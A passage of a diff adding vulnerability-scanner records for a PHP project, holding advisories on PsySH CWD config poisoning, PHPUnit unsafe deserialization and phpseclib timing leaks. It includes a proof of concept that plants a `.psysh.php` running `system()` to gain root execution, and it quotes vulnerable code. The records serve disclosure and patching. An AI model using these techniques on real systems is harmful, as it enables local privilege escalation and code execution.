+                "description": "### Summary\nPsySH automatically loads and executes a `.psysh.php` file from the Current Working Directory (CWD) on startup. If an attacker can write to a directory that a victim later uses as their CWD when launching PsySH, the attacker can trigger arbitrary code execution in the victim's context. When the victim runs PsySH with elevated privileges (e.g., root), this results in local privilege escalation.\n\n### Details\nPsySH supports per-directory configuration via a `.psysh.php` file located in the process CWD. This file is executed implicitly when PsySH starts, without requiring explicit opt-in and without validating that the file and directory are safe (e.g., owned by the current user and not group/world-writable).\n\nThis enables a CWD poisoning scenario: a low-privileged user can plant a malicious `.psysh.php` in any directory they can write to, then wait for a higher-privileged user to start PsySH while their shell is in that directory.\n\n### PoC\n1. As a low-privileged user, create a malicious `.psysh.php` in an attacker-writable directory (example: `/tmp`):\n\n```bash\nbob@localhost:/tmp$ echo \"<?php system('id > poc.txt'); ?>\" > .psysh.php\nbob@localhost:/tmp# ls -lah .psysh.php\n-rw-r--r-- 1 bob bob 33 Jan 28 11:17 .psysh.php\n```\n\n2. As the victim user, start PsySH with CWD set to that directory and exit:\n\n```bash\nroot@localhost:/tmp# cd /tmp\nroot@localhost:/tmp# ./psysh\nPsy Shell v0.12.18 (PHP 8.1.2-1ubuntu2.23 \u2014 cli) by Justin Hileman\nNew PHP manual is available (latest: 3.0.1). Update with `doc --update-manual`\n> exit\n\n   INFO  Goodbye.\n\n```\n\n3. Verify code execution triggered in the victim context:\n\n```bash\nbob@localhost:/tmp$ ls -lah poc.txt\n-rw-r--r-- 1 root root 39 Jan 28 11:19 poc.txt\nbob@localhost:/tmp$ cat poc.txt\nuid=0(root) gid=0(root) groups=0(root)\n````\n\n\n### Impact\n\nThis is a CWD configuration poisoning issue leading to arbitrary code execution in the victim user\u2019s context. If a privileged user (e.g., root, a CI runner, or an ops/debug account) launches PsySH with CWD set to an attacker-writable directory containing a malicious `.psysh.php`, the attacker can execute commands with that privileged user\u2019s permissions, resulting in local privilege escalation.\n\nDownstream consumers that embed PsySH inherit this risk. For example, Laravel Tinker (`php artisan tinker`) uses PsySH. If a privileged user runs Tinker while their shell is in an attacker-writable directory, the `.psysh.php` auto-load behavior can be abused in the same way to execute attacker-controlled code under the victim\u2019s privileges.",
+                "cvssV3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
+                "epssScore": 0.00005,
+                "source": "GITHUB",
+                "published": "2026-01-30 21:28:44.0",
+                "title": "PsySH has Local Privilege Escalation via CWD .psysh.php auto-load",
+                "cwes": [
+                    {
+                        "cweId": 427,
+                        "name": "Uncontrolled Search Path Element"
+                    }
+                ],
+                "uuid": "74d31593-c268-442c-a266-9535ededb57e",
+                "severityRank": 2,
+                "cweName": "Uncontrolled Search Path Element",
+                "epssPercentile": 0.00233
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:31e34ab6-b84e-42f1-905c-60f3aac1d3bc:74d31593-c268-442c-a266-9535ededb57e",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "13.1.7",
+                "name": "phpunit",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpunit/phpunit@10.5.48",
+                "uuid": "ba890e8c-91ed-4b2c-bed2-ea5c3ddf8eac",
+                "version": "10.5.48",
+                "group": "phpunit"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-02-20 12:59:34.981"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 7.8,
+                "vulnId": "GHSA-vvj3-c3rp-c85p",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-vvj3-c3rp-c85p",
+                        "cveId": "CVE-2026-24765"
+                    }
+                ],
+                "references": "* [https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-vvj3-c3rp-c85p](https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-vvj3-c3rp-c85p)\n* [https://github.com/sebastianbergmann/phpunit/commit/613d142f5a8471ca71623ce5ca2795f79248329e](https://github.com/sebastianbergmann/phpunit/commit/613d142f5a8471ca71623ce5ca2795f79248329e)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/10.5.63](https://github.com/sebastianbergmann/phpunit/releases/tag/10.5.63)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/11.5.50](https://github.com/sebastianbergmann/phpunit/releases/tag/11.5.50)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/12.5.8](https://github.com/sebastianbergmann/phpunit/releases/tag/12.5.8)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/8.5.52](https://github.com/sebastianbergmann/phpunit/releases/tag/8.5.52)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/9.6.33](https://github.com/sebastianbergmann/phpunit/releases/tag/9.6.33)\n* [https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-24765](https://nvd.nist.gov/vuln/detail/CVE-2026-24765)\n* [https://github.com/sebastianbergmann/phpunit/commit/3141742e00620e2968d3d2e732d320de76685fda](https://github.com/sebastianbergmann/phpunit/commit/3141742e00620e2968d3d2e732d320de76685fda)\n* [https://lists.debian.org/debian-lts-announce/2026/02/msg00009.html](https://lists.debian.org/debian-lts-announce/2026/02/msg00009.html)\n* [https://github.com/advisories/GHSA-vvj3-c3rp-c85p](https://github.com/advisories/GHSA-vvj3-c3rp-c85p)",
+                "cweId": 502,
+                "description": "### Overview\n\nA vulnerability has been discovered involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists in the `cleanupForCoverage()` method, which deserializes code coverage files without validation, potentially allowing remote code execution if malicious `.coverage` files are present prior to the execution of the PHPT test.\n\n### Technical Details\n\n**Affected Component:** PHPT test runner, method `cleanupForCoverage()`\n**Affected Versions:** <= 8.5.51, <= 9.6.32, <= 10.5.61, <= 11.5.49, <= 12.5.7\n\n### Vulnerable Code Pattern\n\n```php\nif ($buffer !== false) {\n    // Unsafe call without restrictions\n    $coverage = @unserialize($buffer);\n}\n```\n\nThe vulnerability occurs when a `.coverage` file, which should not exist before test execution, is deserialized without the `allowed_classes` parameter restriction. An attacker with local file write access can place a malicious serialized object with a `__wakeup()` method into the file system, leading to arbitrary code execution during test runs with code coverage instrumentation enabled.\n\n### Attack Prerequisites and Constraints\n\nThis vulnerability requires **local file write access** to the location where PHPUnit stores or expects code coverage files for PHPT tests. This can occur through:\n\n* **CI/CD Pipeline Attacks:** A malicious pull request that places a `.coverage` file alongside test files, executed when the CI system runs tests using PHPUnit and collects code coverage information\n* **Local Development Environment:** An attacker with shell access or ability to write files to the project directory\n* **Compromised Dependencies:** A supply chain attack inserting malicious files into a package or monorepo\n\n**Critical Context:** Running test suites from unreviewed pull requests without isolated execution is inherently a code execution risk, independent of this specific vulnerability. This represents a broader class of [Poisoned Pipeline Execution (PPE) attacks](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution) affecting CI/CD systems.\n\n### Proposed Remediation Approach\n\nRather than just silently sanitizing the input via `['allowed_classes' => false]`, the maintainer has chosen to make the anomalous state explicit by treating pre-existing `.coverage` files for PHPT tests as an error condition.\n\n#### Rationale for Error-Based Approach:\n\n1. **Visibility Over Silence:** When an invariant is violated (a `.coverage` file existing before test execution), the error must be visible in CI/CD output, alerting operators to investigate the root cause rather than proceeding with sanitized input\n2. **Operational Security:** A `.coverage` file should never exist before tests run, coverage data is generated by executing tests, not sourced from artifacts. Its presence indicates:\n    * A malicious actor placed it intentionally\n    * Build artifacts from a previous run contaminated the environment\n    * An unexpected filesystem state requiring investigation\n3. **Defense-in-Depth Principle:** Protecting a single deserialization call does not address the fundamental attack surface. Proper mitigations for PPE attacks lie outside PHPUnit's scope:\n    * Isolate CI/CD runners (ephemeral, containerized environments)\n    * Restrict code execution on protected branches\n    * Scan pull requests and artifacts for tampering\n    * Use branch protection rules to prevent unreviewed code execution\n\n### Severity Classification\n\n* **Attack Vector (AV):** Local (L) \u2014 requires write access to the file system where tests execute\n* **Attack Complexity (AC):** Low (L) \u2014 exploitation is straightforward once the malicious file is placed\n* **Privileges Required (PR):** Low (L) \u2014 PR submitter status or contributor role provides sufficient access\n* **User Interaction (UI):** None (N) \u2014 automatic execution during standard test execution\n* **Scope (S):** Unchanged (U) \u2014 impact remains within the affected test execution context\n* **Confidentiality Impact (C):** High (H) \u2014 full remote code execution enables complete system compromise\n* **Integrity Impact (I):** High (H) \u2014 arbitrary code execution allows malicious modifications\n* **Availability Impact (A):** High (H) \u2014 full code execution permits denial-of-service actions\n\n### Mitigating Factors (Environmental Context)\n\nOrganizations can reduce the effective risk of this vulnerability through proper CI/CD configuration:\n\n* **Ephemeral Runners:** Use containerized, single-use CI/CD runners that discard filesystem state between runs\n* **Code Review Enforcement:** Require human review and approval before executing code from pull requests\n* **Branch Protection:** Enforce branch protection rules that block unreviewed code execution\n* **Artifact Isolation:** Separate build artifacts from source; never reuse artifacts across independent builds\n* **Access Control:** Limit file write permissions in CI environments to authenticated, trusted actors\n\n### Fixed Behaviour\n\nWhen a `.coverage` file is detected for a PHPT test prior to execution, PHPUnit will emit a clear error message identifying the anomalous state. This ensures:\n\n* **Visibility:** The error appears prominently in CI/CD output and test logs\n* **Investigation:** Operations teams can investigate the root cause (potential tampering, environment contamination)\n* **Fail-Fast Semantics:** Test execution stops rather than proceeding with an unexpected state\n\n### Recommendation\n\n**Update to the patched version immediately** if a project runs PHPT tests using PHPUnit with coverage instrumentation in any CI/CD environment that executes code from external contributors. Additionally, audit the project's CI/CD configuration to ensure:\n\n* Pull requests from forks or untrusted sources execute in isolated environments\n* Branch protection rules require human review before code execution\n* CI/CD runners are ephemeral and discarded after each build\n* Build artifacts are not reused across independent runs without validation",
+                "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
+                "epssScore": 0.00081,
+                "source": "GITHUB",
+                "published": "2026-01-27 22:26:22.0",
+                "title": "PHPUnit Vulnerable to Unsafe Deserialization in PHPT Code Coverage Handling",
+                "cwes": [
+                    {
+                        "cweId": 502,
+                        "name": "Deserialization of Untrusted Data"
+                    }
+                ],
+                "uuid": "ac02ba9c-479f-4c0d-8ac8-3cdcd014583a",
+                "severityRank": 1,
+                "cweName": "Deserialization of Untrusted Data",
+                "epssPercentile": 0.23701
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:ba890e8c-91ed-4b2c-bed2-ea5c3ddf8eac:ac02ba9c-479f-4c0d-8ac8-3cdcd014583a",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "13.1.7",
+                "name": "phpunit",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpunit/phpunit@10.5.48",
+                "uuid": "ba890e8c-91ed-4b2c-bed2-ea5c3ddf8eac",
+                "version": "10.5.48",
+                "group": "phpunit"
+            },
+            "attribution": {
+                "alternateIdentifier": "CVE-2026-24765",
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-02-20 12:59:54.281",
+                "referenceUrl": "https://ossindex.sonatype.org/vulnerability/CVE-2026-24765?component-type=composer&component-name=phpunit%2Fphpunit&utm_source=dependency-track&utm_medium=integration&utm_content=v4.13.6"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 7.8,
+                "vulnId": "CVE-2026-24765",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-vvj3-c3rp-c85p",
+                        "cveId": "CVE-2026-24765"
+                    }
+                ],
+                "references": "* [https://github.com/sebastianbergmann/phpunit/commit/3141742e00620e2968d3d2e732d320de76685fda](https://github.com/sebastianbergmann/phpunit/commit/3141742e00620e2968d3d2e732d320de76685fda)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/10.5.63](https://github.com/sebastianbergmann/phpunit/releases/tag/10.5.63)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/11.5.50](https://github.com/sebastianbergmann/phpunit/releases/tag/11.5.50)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/12.5.8](https://github.com/sebastianbergmann/phpunit/releases/tag/12.5.8)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/8.5.52](https://github.com/sebastianbergmann/phpunit/releases/tag/8.5.52)\n* [https://github.com/sebastianbergmann/phpunit/releases/tag/9.6.33](https://github.com/sebastianbergmann/phpunit/releases/tag/9.6.33)\n* [https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-vvj3-c3rp-c85p](https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-vvj3-c3rp-c85p)\n* [https://lists.debian.org/debian-lts-announce/2026/02/msg00009.html](https://lists.debian.org/debian-lts-announce/2026/02/msg00009.html)",
+                "cweId": 502,
+                "description": "PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists in the `cleanupForCoverage()` method, which deserializes code coverage files without validation, potentially allowing remote code execution if malicious `.coverage` files are present prior to the execution of the PHPT test. The vulnerability occurs when a `.coverage` file, which should not exist before test execution, is deserialized without the `allowed_classes` parameter restriction. An attacker with local file write access can place a malicious serialized object with a `__wakeup()` method into the file system, leading to arbitrary code execution during test runs with code coverage instrumentation enabled. This vulnerability requires local file write access to the location where PHPUnit stores or expects code coverage files for PHPT tests. This can occur through CI/CD pipeline attacks, the local development environment, and/or compromised dependencies. Rather than just silently sanitizing the input via `['allowed_classes' => false]`, the maintainer has chosen to make the anomalous state explicit by treating pre-existing `.coverage` files for PHPT tests as an error condition. Starting in versions  in versions 12.5.8, 11.5.50, 10.5.62, 9.6.33, when a `.coverage` file is detected for a PHPT test prior to execution, PHPUnit will emit a clear error message identifying the anomalous state. Organizations can reduce the effective risk of this vulnerability through proper CI/CD configuration, including ephemeral runners, code review enforcement, branch protection, artifact isolation, and access control.",
+                "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
+                "epssScore": 0.00126,
+                "source": "NVD",
+                "published": "2026-01-27 22:15:56.79",
+                "cwes": [
+                    {
+                        "cweId": 502,
+                        "name": "Deserialization of Untrusted Data"
+                    }
+                ],
+                "uuid": "917e90e5-5330-4fe2-aa34-31f9a21dd4f3",
+                "severityRank": 1,
+                "cweName": "Deserialization of Untrusted Data",
+                "epssPercentile": 0.31632
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:ba890e8c-91ed-4b2c-bed2-ea5c3ddf8eac:917e90e5-5330-4fe2-aa34-31f9a21dd4f3",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "3.0.51",
+                "name": "phpseclib",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpseclib/phpseclib@3.0.49",
+                "uuid": "49d15a67-4a45-4986-abb0-57b1e0a36592",
+                "version": "3.0.49",
+                "group": "phpseclib"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-03-20 00:24:59.612"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "vulnId": "GHSA-94g3-g5v7-q4jg",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-94g3-g5v7-q4jg",
+                        "cveId": "CVE-2026-32935"
+                    }
+                ],
+                "references": "* [https://github.com/phpseclib/phpseclib/security/advisories/GHSA-94g3-g5v7-q4jg](https://github.com/phpseclib/phpseclib/security/advisories/GHSA-94g3-g5v7-q4jg)\n* [https://github.com/phpseclib/phpseclib/commit/ccc21aef71eb170e9bf819b167e67d1fd9e6e788](https://github.com/phpseclib/phpseclib/commit/ccc21aef71eb170e9bf819b167e67d1fd9e6e788)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-32935](https://nvd.nist.gov/vuln/detail/CVE-2026-32935)\n* [https://github.com/advisories/GHSA-94g3-g5v7-q4jg](https://github.com/advisories/GHSA-94g3-g5v7-q4jg)",
+                "cvssV4Score": 8.2,
+                "cweId": 208,
+                "description": "### Impact\nThose using AES in CBC mode may be susceptible to a padding oracle timing attack.\n\n### Patches\nhttps://github.com/phpseclib/phpseclib/commit/ccc21aef71eb170e9bf819b167e67d1fd9e6e788\n\n### Workarounds\nUse AES in CTR, CFB or OFB modes",
+                "source": "GITHUB",
+                "published": "2026-03-19 16:42:18.0",
+                "title": "phpseclib's AES-CBC unpadding susceptible to padding oracle timing attack",
+                "cwes": [
+                    {
+                        "cweId": 208,
+                        "name": "Observable Timing Discrepancy"
+                    }
+                ],
+                "uuid": "4d5e727b-9e95-4b10-b43c-622c998a9aa6",
+                "severityRank": 1,
+                "cweName": "Observable Timing Discrepancy",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:49d15a67-4a45-4986-abb0-57b1e0a36592:4d5e727b-9e95-4b10-b43c-622c998a9aa6",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "3.0.51",
+                "name": "phpseclib",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpseclib/phpseclib@3.0.49",
+                "uuid": "49d15a67-4a45-4986-abb0-57b1e0a36592",
+                "version": "3.0.49",
+                "group": "phpseclib"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-03-21 01:00:18.254"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 5.9,
+                "vulnId": "CVE-2026-32935",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-94g3-g5v7-q4jg",
+                        "cveId": "CVE-2026-32935"
+                    }
+                ],
+                "references": "* [https://github.com/phpseclib/phpseclib/commit/ccc21aef71eb170e9bf819b167e67d1fd9e6e788](https://github.com/phpseclib/phpseclib/commit/ccc21aef71eb170e9bf819b167e67d1fd9e6e788)\n* [https://github.com/phpseclib/phpseclib/security/advisories/GHSA-94g3-g5v7-q4jg](https://github.com/phpseclib/phpseclib/security/advisories/GHSA-94g3-g5v7-q4jg)",
+                "cvssV4Score": 8.2,
+                "cweId": 208,
+                "description": "phpseclib is a PHP secure communications library. Projects using versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a to padding oracle timing attack when using AES in CBC mode. This issue has been fixed in versions 1.0.27, 2.0.52 and 3.0.50.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
+                "epssScore": 0.0002,
+                "source": "NVD",
+                "published": "2026-03-20 03:16:00.763",
+                "cwes": [
+                    {
+                        "cweId": 208,
+                        "name": "Observable Timing Discrepancy"
+                    }
+                ],
+                "uuid": "ae415070-f9c4-42b5-97a7-5f216f0616d5",
+                "severityRank": 1,
+                "cweName": "Observable Timing Discrepancy",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
+                "epssPercentile": 0.05353
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:49d15a67-4a45-4986-abb0-57b1e0a36592:ae415070-f9c4-42b5-97a7-5f216f0616d5",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "3.0.51",
+                "name": "phpseclib",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpseclib/phpseclib@3.0.49",
+                "uuid": "49d15a67-4a45-4986-abb0-57b1e0a36592",
+                "version": "3.0.49",
+                "group": "phpseclib"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-11 00:00:33.307"
+            },
+            "vulnerability": {
+                "severity": "LOW",
+                "cvssV3BaseScore": 3.7,
+                "vulnId": "GHSA-r854-jrxh-36qx",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-r854-jrxh-36qx",
+                        "cveId": "CVE-2026-40194"
+                    }
+                ],
+                "references": "* [https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx](https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx)\n* [https://github.com/phpseclib/phpseclib/commit/ffe48b6b1b1af6963327f0a5330e3aa004a194ac](https://github.com/phpseclib/phpseclib/commit/ffe48b6b1b1af6963327f0a5330e3aa004a194ac)\n* [https://github.com/phpseclib/phpseclib/releases/tag/1.0.28](https://github.com/phpseclib/phpseclib/releases/tag/1.0.28)\n* [https://github.com/phpseclib/phpseclib/releases/tag/2.0.53](https://github.com/phpseclib/phpseclib/releases/tag/2.0.53)\n* [https://github.com/phpseclib/phpseclib/releases/tag/3.0.51](https://github.com/phpseclib/phpseclib/releases/tag/3.0.51)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-40194](https://nvd.nist.gov/vuln/detail/CVE-2026-40194)\n* [https://github.com/advisories/GHSA-r854-jrxh-36qx](https://github.com/advisories/GHSA-r854-jrxh-36qx)",
+                "cweId": 208,
+                "description": "# phpseclib SSH2: Variable-time comparison in HMAC verification\n\n## Summary\n\n`phpseclib\\Net\\SSH2::get_binary_packet()` uses PHP's `!=` operator to compare a received SSH packet HMAC against the locally computed HMAC. `!=` on equal-length binary strings in PHP uses `memcmp()`, which short-circuits on the first differing byte. This is a real variable-time comparison (CWE-208), proven by scaling benchmarks.\n\nThe finding is **Low severity (defense-in-depth)**, not Critical. Practical exploitation over the network is prevented by SSH's disconnect-on-MAC-failure behavior combined with per-connection session keys. The fix is a one-liner: replace `!=` with `hash_equals()`, which the codebase already uses in 9 other places.\n\n- **Target:** `phpseclib/phpseclib`\n- **File:** `phpseclib/Net/SSH2.php`\n- **Lines (master `e819a163c`):** 3405 and 3410\n- **CWE:** CWE-208 (Observable Timing Discrepancy)\n- **CVSS v3.1:** 3.7 \u2014 `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N`\n- **Severity:** Low (cryptographic hygiene / defense-in-depth)\n- **Affected branches:** `master`, `3.0`, `2.0`, `1.0` (all supported versions)\n\n## Root cause\n\n`phpseclib/Net/SSH2.php` lines 3399-3415 (master at `e819a163c`):\n\n```php\nif ($this->hmac_check instanceof Hash) {\n    $reconstructed = !$this->hmac_check_etm ?\n        pack('Na*', $packet->packet_length, $packet->plain) :\n        substr($packet->raw, 0, -$this->hmac_size);\n    if (($this->hmac_check->getHash() & \"\\xFF\\xFF\\xFF\\xFF\") == 'umac') {\n        $this->hmac_check->setNonce(\"\\0\\0\\0\\0\" . pack('N', $this->get_seq_no));\n        if ($hmac != $this->hmac_check->hash($reconstructed)) {                     // <-- line 3405\n            $this->disconnect_helper(DisconnectReason::MAC_ERROR);\n            throw new ConnectionClosedException('Invalid UMAC');\n        }\n    } else {\n        if ($hmac != $this->hmac_check->hash(pack('Na*', $this->get_seq_no, $reconstructed))) {  // <-- line 3410\n            $this->disconnect_helper(DisconnectReason::MAC_ERROR);\n            throw new ConnectionClosedException('Invalid HMAC');\n        }\n    }\n}\n```\n\nBoth `$hmac` (read from the socket via `Strings::pop($raw, $this->hmac_size)` at line 3348) and the computed hash are equal-length binary strings. PHP's `!=` operator on equal-length strings dispatches to `zend_binary_strcmp()` which internally calls `memcmp()`. Modern libc `memcmp` short-circuits on the first differing byte, producing a timing signal that scales linearly with the number of matching leading bytes.\n\n### The same bug exists on every supported branch\n\n| Branch | File | Line(s) | Expression |\n|---|---|---|---|\n| `master` (@ `e819a163c`) | `phpseclib/Net/SSH2.php` | 3405, 3410 | `$hmac != $this->hmac_check->hash(...)` |\n| `3.0` | `phpseclib/Net/SSH2.php` | 3741, 3746 | `$hmac != $this->hmac_check->hash(...)` |\n| `2.0` | `phpseclib/Net/SSH2.php` | 3796 | `$hmac != $this->hmac_check->hash(...)` |\n| `1.0` | `phpseclib/Net/SSH2.php` | 3810 | `$hmac != $this->hmac_check->hash(...)` |\n\nVerified with `git show <branch>:phpseclib/Net/SSH2.php`.\n\n### Reachability\n\nThe HMAC verification path at lines 3399-3415 is reached on **every received SSH packet** when the negotiated cipher is not AEAD \u2014 i.e., any of:\n\n- `aes128-cbc`, `aes192-cbc`, `aes256-cbc`\n- `aes128-ctr`, `aes192-ctr`, `aes256-ctr`\n- `3des-cbc`, `3des-ctr`\n- `blowfish-cbc`, `blowfish-ctr`\n- `twofish-*-cbc`, `twofish-*-ctr`\n- `arcfour`, `arcfour128`, `arcfour256`\n\ncombined with any non-AEAD MAC (hmac-sha2-256, hmac-sha2-512, hmac-sha1, hmac-sha1-96, hmac-md5, hmac-md5-96, umac-64, umac-128, and their -etm variants \u2014 full list at `getSupportedMACAlgorithms()` around line 4754).\n\nAEAD ciphers (`aes128-gcm@openssh.com`, `aes256-gcm@openssh.com`, `chacha20-poly1305@openssh.com`) go through a different path (lines 3353-3381) and do not reach the `!=` comparison \u2014 their authentication tag is checked inside the AEAD implementation.\n\n`$this->hmac_check` is set during key exchange at `SSH2.php:1812`:\n\n```php\nif (!$this->decrypt->usesNonce()) {\n    [$this->hmac_check, $checkKeyLength] = self::mac_algorithm_to_hash_instance($mac_algorithm_in);\n    $this->hmac_size = $this->hmac_check->getLengthInBytes();\n}\n```\n\nSo any SSH2 client session negotiating a non-AEAD cipher exercises the vulnerable code path starting from the first post-KEX packet.\n\n### Contrast with existing code that does the right thing\n\n`hash_equals()` is already used in 9 other places in the phpseclib codebase, proving the maintainer knows the pattern:\n\n```\nphpseclib/File/CMS/DigestedData.php:186\nphpseclib/File/CMS/SignedData/Signer.php:294\nphpseclib/File/CMS/SignedData/Signer.php:406\nphpseclib/Crypt/Common/Formats/Keys/PuTTY.php:236\nphpseclib/Crypt/RSA/PublicKey.php:98, 105, 188, 229\nphpseclib/Crypt/RSA/PrivateKey.php:386\n```\n\nThe SSH2 MAC comparison is the one place it was missed.\n\n## Proof of concept\n\nAll scripts under `poc/`. They prove three things:\n1. PHP's `!=` on equal-length binary strings IS variable-time and short-circuits.\n2. `hash_equals()` is constant-time over the same inputs.\n3. Applied to 32-byte HMAC-SHA256 values as produced by phpseclib's `Crypt\\Hash` class, the code path at `SSH2.php:3405/3410` leaks ~2-14 ns of signal per comparison.\n\n### PoC 1: baseline measurement (`poc/01_verify_variable_time.php`)\n\nMeasures `!=` vs `hash_equals()` on 32-byte strings with first-byte vs last-byte mismatch. 500,000 iterations each, trimmed mean, Welch's t-test.\n\nRepresentative output (PHP 8.3.6 on Linux x86_64):\n\n```\n=== PHP != operator vs hash_equals() on 32-byte strings ===\nIterations: 500000\n\n!= first-byte mismatch: median=40 p25=40 p75=50 tmean=44.3\n!= last-byte mismatch:  median=50 p25=40 p75=50 tmean=46.4\nGap (last - first):     tmean_delta=2.1 ns\n\nhash_equals first-byte: median=110 tmean=112.7\nhash_equals last-byte:  median=111 tmean=114.9\nGap (last - first):     tmean_delta=2.2 ns\n```\n\nThe 32-byte delta is small (~2 ns) and lives in the noise. This alone doesn't prove variable-time behavior. PoC 2 does.\n\n### PoC 2: scaling test (`poc/02_scaling_test.php`)\n\nThe decisive test. If `!=` is truly constant-time, timing should not depend on mismatch position. If it short-circuits, timing should scale linearly with prefix length. Test strings from 32 bytes to 4096 bytes.\n\n```\nLength  32 bytes: range (first-last byte mismatch) =   1.72 ns\nLength  64 bytes: range                            =   2.42 ns\nLength 128 bytes: range                            =   8.33 ns\nLength 256 bytes: range                            =  16.91 ns\nLength 512 bytes: range                            =  38.89 ns\nLength 1024 bytes: range                           =  81.16 ns\nLength 4096 bytes: range                           = 284.26 ns\n```\n\n**This is monotone, linear scaling.** Confirmed variable-time: `!=` short-circuits. Per-byte delta ≈ 0.089 ns/byte (4096 bytes → ~284 ns → 284/4096 ≈ 0.069 ns/byte after accounting for the fixed call overhead).\n\n### PoC 3: contrast with `hash_equals()` (`poc/03_hash_equals_scaling.php`)\n\nSame test, `!=` vs `hash_equals()` on 1024-byte strings:\n\n```\nMismatch pos         | != tmean (ns)        | hash_equals tmean\n----------------------------------------------------------------------\nbyte    0            |    83.72 (sd  4.79) |   873.78 (sd 100.71)\nbyte  128            |    98.48 (sd  8.27) |   855.10 (sd 87.50)\nbyte  256            |   103.36 (sd  7.01) |   869.21 (sd 89.61)\nbyte  512            |   125.65 (sd 10.07) |   879.74 (sd 81.82)\nbyte  768            |   145.73 (sd  9.96) |   848.59 (sd 84.34)\nbyte 1023            |   175.33 (sd 14.31) |   852.24 (sd 85.81)\n\n!= range (last - first):          91.62 ns\nhash_equals range (last - first): 31.15 ns\n```\n\n`!=` monotonically increases with mismatch position. `hash_equals` is flat; the 31 ns range is measurement jitter (sd ≈ 90 ns > range).\n\nPer-byte delta from this run: 91.62 / 1023 ≈ 0.089 ns/byte. Extrapolated to 32-byte HMAC: ~2.86 ns total signal between first-byte-diff and last-byte-diff.\n\n### PoC 4: end-to-end with phpseclib's Hash class (`poc/04_phpseclib_in_context.php`)\n\nUses `phpseclib4\\Crypt\\Hash` (the exact class bound to `$this->hmac_check`) to compute a real HMAC-SHA-256, then executes the exact expression `$hmac != $this->hmac_check->hash(...)` from 